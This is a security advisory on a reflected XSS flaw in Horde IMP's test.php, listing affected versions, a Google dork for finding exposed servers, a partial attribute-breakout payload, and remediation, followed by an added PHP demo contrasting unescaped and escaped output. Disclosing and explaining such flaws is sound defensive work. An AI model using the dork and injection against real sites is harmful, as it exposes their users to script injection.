+======================================================================================================+
+ Horde & Turba Contact Manager & XSS Vulnerabilities and Remote Java's File Inclusion                   +
+======================================================================================================+

Author(s): Ivan Sanchez
Product:   Turba Contact Manager
Web:       http://www.horde.org/turba/

Turba is the Horde contact management application. It is a production-level
address book and makes heavy use of the Horde framework to provide integration
with IMP and other Horde applications.

Date: 14/09/2008

Version Affected:
-----------------
Download: http://ftp.horde.org/pub/turba/turba-h3-2.2.1.tar.gz
Others:
 * Turba H3 (2.2.1) (final)
 * turba-h3.1.1
 * IMP: H3 (4.2)
 * IMP: H3 (4.1)
 * IMP: 4.1-cvs
 * IMP: H3 (4.1.6)
 * IMP: H3 (4.1.3)
 * IMP: 3.2.2

Google Dork:
------------
inurl:"/imp/test.php?"

Evil Function:
--------------
http://site/horde/imp/test.php?

Internal Variables:
-------------------
1- Download Turba H3 (2.2.1) (final) and audit the internal code, where we can see:

2- The relevant file and lines. File: test.php, Lines: 92/94

   $user = isset($_POST['user']) ? $_POST['user'] : ''; // 'user';

   The value read from $_POST['user'] is reflected back into the "User" text
   box of the test form without being escaped.

First Exploit:
--------------
Insert an XSS payload or a remote JavaScript file include into the "User"
text box:

   Server    ok
   Protocol  ok (e.g. "imap" or "imap/notls")
   Port      ok (defaults to "143")
   User      <---------------------------------- 'user'= ">
   Password  ok

Remediation:
------------
Sanitize (escape) all user-supplied parameters before they are echoed back
into the page.

Thx.

NULL CODE SERVICES [ www.nullcode.com.ar ]
Hunting Security Bugs!
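The following is an added example, not code from Horde or IMP: it reconstructs the pattern the advisory describes (the user value is reflected into a quoted "value" attribute of the form's text box) and places the attribute-escaped version beside it. The form markup and the function names are assumptions.

```php
<?php
// Added example, not Horde/IMP code. Reconstructs the pattern described in
// the advisory: test.php reads $_POST['user'] and reflects it into the
// "User" text box of the IMAP test form. The form markup is assumed.

/**
 * Unsafe: the raw value is dropped into a double-quoted attribute, so any
 * input starting with "> closes the <input> tag and whatever follows is
 * parsed by the browser as new markup (reflected XSS).
 */
function render_user_field_unsafe(string $user): string
{
    return '<input type="text" name="user" value="' . $user . '" />';
}

/**
 * Hardened: escape for the HTML-attribute context before echoing.
 * ENT_QUOTES turns both " and ' into entities, so the attribute cannot be
 * closed early; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning
 * an empty string (which would silently drop the field's value).
 */
function render_user_field_safe(string $user): string
{
    $escaped = htmlspecialchars($user, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="user" value="' . $escaped . '" />';
}

// Same read pattern as the advisory's line 92/94. When run from the CLI
// there is no POST body, so a constructed sample is used: the "> attribute
// breakout prefix shown in the advisory, followed by an inert bold tag
// rather than any script.
$user = isset($_POST['user']) ? $_POST['user'] : '"><b>injected</b>';

// In the unsafe rendering the <input> is terminated after value="" and the
// <b> element becomes part of the page; in the safe rendering the whole
// string stays inside the attribute as literal text.
echo render_user_field_unsafe($user), PHP_EOL;
echo render_user_field_safe($user), PHP_EOL;
```

Run it with `php example.php` and compare the two lines: only the first contains a `<b>` element outside the input tag.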